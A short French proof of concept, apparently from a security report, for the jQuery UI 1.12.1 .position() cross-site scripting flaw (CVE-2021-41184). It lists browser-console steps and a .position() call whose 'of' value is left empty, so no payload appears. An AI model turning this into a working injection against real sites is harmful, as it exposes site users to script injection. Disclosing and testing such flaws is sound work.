
Preuve de concept d'exploit pour CVE-2021-41184, une vulnérabilité de type cross-site scripting (XSS) dans l'utilitaire .position() de jQuery UI, ciblant la version 1.12.1.
Exploit Medium CVE-2021-41184 XSS dans l'option of de l'utilitaire .position()
1.1 https://www.website.com/_js/jquery/jquery-ui-1.12.1/jquery-ui.min.js
------------------------------------------------Preuve de concept---------------------------------------------------------------
Ouvrir l'URL
Ouvrir l'inspecteur
Chercher un ID dans les éléments du site
3.1 #ID
Aller dans l'onglet console
Injecter le script avec l'ID sélectionné au point 3.1
5.1 Script
$("#id").position( {
my: "center",
at: "right bottom",
of: "",
collision: "none"
});